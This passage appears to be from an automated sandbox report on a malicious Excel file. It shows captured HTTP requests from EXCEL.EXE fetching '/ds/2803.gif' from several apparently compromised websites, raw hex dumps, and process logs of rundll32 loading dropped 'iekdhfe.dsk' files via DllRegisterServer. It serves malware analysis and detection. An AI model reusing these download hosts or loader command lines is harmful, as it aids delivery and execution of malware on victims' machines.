                Data Raw: 66 66 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cc 59 59 93 a3 48 92 7e 9f 5f a1 ad b5 35 9b 31 3a 8b fb aa ae 6a 5b 6e 90 04 02 04 08 f4 86 b8 c5 29 6e 69 6d ff fb 42 66 1d 99 d9 5d dd 3b 63 fb b0 f1 20 20 dc c3 c3 fd 0b 77 8f 90 c7 e7 7f e3 0f 9c e5 e9 c2 26 ed cb e2 b7 bf 7d 7e 79 6c 96 f6 39 8d fc f0 b7 bf 3d bf 96 51 ef 2f 1c 7d f3 14 dd 86 6c fc f2 81 ab ab 3e aa fa a7 fe de 44 1f 36 c1 cb d7 97 0f 7d 34 f7 e0 2a e2 d7 4d 90 fa 6d 17 f5 5f 86 3e 7e a2 3e fc 54 8e 1f a4 d1 d3 3a be ad 8b 57 82 aa fa 29 58 49 3f 1d a8 b7 7e 52 fa ff cc 08 61 6e b2 36 ea 5e 0d 81 de 48 af fc 32 fa f2 61 cc a2 a9 a9 db fe 15 db 94 85 7d fa 25 8c c6 2c 88 9e 9e 3f 7e d9 64 55 d6 67 7e f1 d4 05 7e 11 7d 81 3f 7e 17 d5 67 7d 11 fd c6 04 41 3d 54 fd e6 38 74 4d 54 85 51 f8 19 7c 21 bc c0 59 64 55 be 69 a3 e2 cb 87 ae bf 17 51 97 46 d1 32 61 da 46 f1 97 0f 20 38 74 d1 c7 78 41 c4 9f a2 ae 2e a3 8f 41 5d 82 0b 73 e4 77 51 07 8e f8 47 e8 23 01 06 5d 07 fa 45 f1 71 79 7e 33 e2 59 d4 66 5d 90 af eb f0 83 b6 ae e1 a5 0e ef 9b ff 7a 9e 7f fd 5c db 3a c9 53 ec 97 59 71 ff b4 61 da c5 9e 5f 36 72 54 8c 51 9f 05 fe 2f 9b ce af ba a7 2e 6a b3 f8 d7 df 0f eb b2 47 f4 69 03 63 cd fc 96 b8 98 16 3d a5 51 96 a4 fd 42 fe 88 21 14 4e c2 18 42 bf e5 ba f8 41 9e b4 0b 44 e1 b2 f6 45 dd 7e da fc 7b fc dc de b2 7d a3 21 22 8a a0 d0 5b 5a e3 87 61 56 25 9f 36 ef fa 4b bf 4d b2 ea 4d f7 7f 7f 57 bf 8b 82 3e ab ab 77 38 84 59 d7 14 fe 82 c1 a5 a8 83 fc ff 60 9a 65 c9 96 e5 5b 90 68 df cd f4 a2 dc 53 11 c5 0b 3a fe d0 d7 6f 27 fb 4a 6e 5f d0 fb 3d fd 87 cd 1b 18 7a 8d fc 0f 0b 3f ae b0 ac 36 2e ce 99 55 71 fd 4e 81 57 c0 b7 51 13 f9 8b 1a 4b a8 bd bc be d5 e5 15 e7 f7 65 a0 51 06 63 de b2 7d a3 89 cf ed 07 ed e7 1a 3d 65 7d 54 76 ef f4 fa 6e 19 f2 c6 ae d5 4b cb ac fa e1 50 34 fa 13 b3 57 5b 17 36 7f f5 89 77 b2 9f dd 7c fa ea 92 97 ba 08 7f 68 b9 ca 5f 73 d6 93 5f 64 c9 e2 34 eb c2 bc a5 4e 75 1b 3e 5d da c8 cf 17 f7 58 1f 0b 6b f1 8e 65 cd 0f 8b b3 43 d0 7f fc 20 bc b2 bf eb fd 7e e8 
16 90 fd ee 77 ae f7 ac db 4b 2c 21 6f c6 af 9a fd 99 5f 7e c3 9d 7b 6e 7f 38 ef cb 84 4f ab 7d ef 10 f9 16 23 2b d8 ef e3 e7 95 46 30 f1 2f 82 fd 35 39 d0 3f 01 e4 e7 8a bd 9e 1c fb e3 d1 ff 59 46 61 e6 6f fe be ba c5 73 32 fe b4 21 09 aa 99 ff f1 ce c6 bf 08 84 15 df a6 ee 9e 43 e5 d3 9a 8b fd 3e 1b a3 1f 38 ae f4 b5 d5 63 d4 c6 45 3d 7d da a4 59 18 46 d5 ef 39 5e 05 4a 56 fa c9 92 15 ab ba 7a 27 e9 87 37 ac 32 df ab f6 87 11 b1 32 fe 49 54 bc 93 f8 b3 84 b3 4a f9 8a d2 9b d5 58 fb df 89 f8 33 37 5d d9 bf 7b 63 56 ad 49 fe 2d 10 3f 64 fd 78 fb 83 95 a2 69 e4 5f 5a a9 df 63 3c b4 c5 df 43 bf f7 3f 3d 63 0e 36 55 f2 eb 65 d9 20 09 ec 97 cc 61 0f e6 04 ed a4 a4 66 96 a6 1d ed 54 b0 93 e5 4d 5f 3f f9 1b c7 a8 cb 93 6b e7 6b 1a ae 3d 3d cc aa 8e 60 af af 4b e3 c1 ff c7 0d 07 e2 ea af d4 23 80 b1 fd 2b 9e af 74 20 c3 a3 d0 5a ad d6 5d f3 68 15 0b 2e 86 c0 31 93 21 b2 49 a0 70 46 bd e7 19 e8 c0 cf 8c 29 a4 aa 2d 9a 9e 2b b1 b9 2f cd 53 28 a7 54 a2 1c 95 eb 96 b3 cb ed 3d a9 77 c7 ba dd 73 d0 b0 7f 30 93 6a 29 0f 8d b7 11 ed 91 e0 32 39 43 ee 22 9f ab c2 ad 29 88 76 c4 c8 bd eb 16 0f a9 a3 4c d2 32 50 4e cc e5 b9 d9 cd a9 32 f5 0a 3b 25 ca e0 79 d8 b0 1c 81 9c 2d 72 6b f6 3b 9e 34 a8 1e 39 93 73 c3 a3 15 d1 e5 3e 0d 22 17 95 56 c7 07 51 4b c2 dd 15 eb 9d 1c 97 69 54 47 d3 4c 07 5e 94 3a 83 2e ab 16 76 6d d2 3b db 6b f2 2c 1b 25 2f 25 ec 78 be ba ec 70 d2 90 a4 4e 2e fa 9d 30 fb e0 10 5d 35 7d 16 f3 0b c0 09 5e 2a 73 71 b9 25 78 e3 98 c6 82 14 ab 3d 09 8b 07 3d 69 04 58 97 0f aa 25 78
                Data Ascii: ff3YYH~_51:j[n)nimBf];c w&}~yl9=Q/}l>D6}4*Mm_>~>T:W)XI?~Ran6^H2a}%,?~dUg~~}?~g}A=T8tMTQ|!YdUiQF2aF 8txA.A]swQG#]Eqy~3Yf]z\:SYqa_6rTQ/.jGic=QB!NBADE~{}!"[ZaV%6KMMW>w8Y`e[hS:o'Jn_=z?6.UqNWQKeQc}=e}TvnKP4W[6w|h_s_d4Nu>]XkeC ~wK,!o_~{n8O}#+F0/59?YFaos2!C>8cE=}YF9^JVz'722ITJX37]{cVI-?dxi_Zc<C?=c6Ue afTM_?kk==`K#+t Z]h.1!IpF)-+/S(T=ws0j)29C")vL2PN2;%y-rk;49s>"VQKiTGL^:.vm;k,%/%xpN.0]5}^*sq%x==iX%x


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 31.170.166.139 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Apr 7, 2021 10:46:55.395570040 CEST | 7 | OUT | GET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tienda.ventadigital.com.ar
                Connection: Keep-Alive
Apr 7, 2021 10:46:55.620822906 CEST | 7 | IN | HTTP/1.1 503 Service Unavailable
                Connection: Keep-Alive
                X-Powered-By: PHP/7.2.34
                Content-Type: text/html; charset=UTF-8
                Content-Length: 97
                Content-Encoding: gzip
                Vary: Accept-Encoding
                Date: Wed, 07 Apr 2021 08:46:55 GMT
                Server: LiteSpeed
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 b2 30 30 d6 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 8c 1f 10 3a 4f 00 00 00
                Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)700KLS(O,V/QHPS(,V(N-*K-:O


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 143.95.33.96 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Apr 7, 2021 10:46:55.942820072 CEST | 8 | OUT | GET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: thirdstringcalifornia.com
                Connection: Keep-Alive
Apr 7, 2021 10:46:56.220531940 CEST | 9 | IN | HTTP/1.1 503 Service Unavailable
                Server: nginx/1.18.0
                Date: Wed, 07 Apr 2021 08:46:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
                Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 32 38 30 33 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a
                Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/2803.gif was not found on this server.


                Session ID:3
                Source IP:192.168.2.22
                Source Port:49170
                Destination IP:103.68.166.129
                Destination Port:80
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                Timestamp:Apr 7, 2021 10:46:56.392405987 CEST
                kBytes transferred:10
                Direction:OUT
                Data:GET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: holmesservices.mobiledevsite.co
                Connection: Keep-Alive
                Timestamp:Apr 7, 2021 10:46:56.506817102 CEST
                kBytes transferred:10
                Direction:IN
                Data:HTTP/1.1 503 Service Unavailable
                Server: nginx
                Date: Wed, 07 Apr 2021 08:46:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                X-Powered-By: PHP/7.4.12
                Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 32 38 30 33 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/2803.gif was not found on this server.0


                Session ID:4
                Source IP:192.168.2.22
                Source Port:49171
                Destination IP:66.36.231.40
                Destination Port:80
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                Timestamp:Apr 7, 2021 10:46:56.842498064 CEST
                kBytes transferred:11
                Direction:OUT
                Data:GET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: nellaimasthanbiryani.com
                Connection: Keep-Alive
                Timestamp:Apr 7, 2021 10:46:57.104089022 CEST
                kBytes transferred:11
                Direction:IN
                Data:HTTP/1.1 503 Service Unavailable
                Server: nginx
                Date: Wed, 07 Apr 2021 08:47:00 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
                X-Powered-By: PHP/5.6.40
                Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 32 38 30 33 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/2803.gif was not found on this server.0


                Code Manipulations

                Statistics

                Behavior

                System Behavior

                General

                Start time:10:46:36
                Start date:07/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fbb0000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:42
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:43
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk1,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:43
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk2,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:43
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk3,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:46:44
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\iekdhfe.dsk4,DllRegisterServer
                Imagebase:0xff3c0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis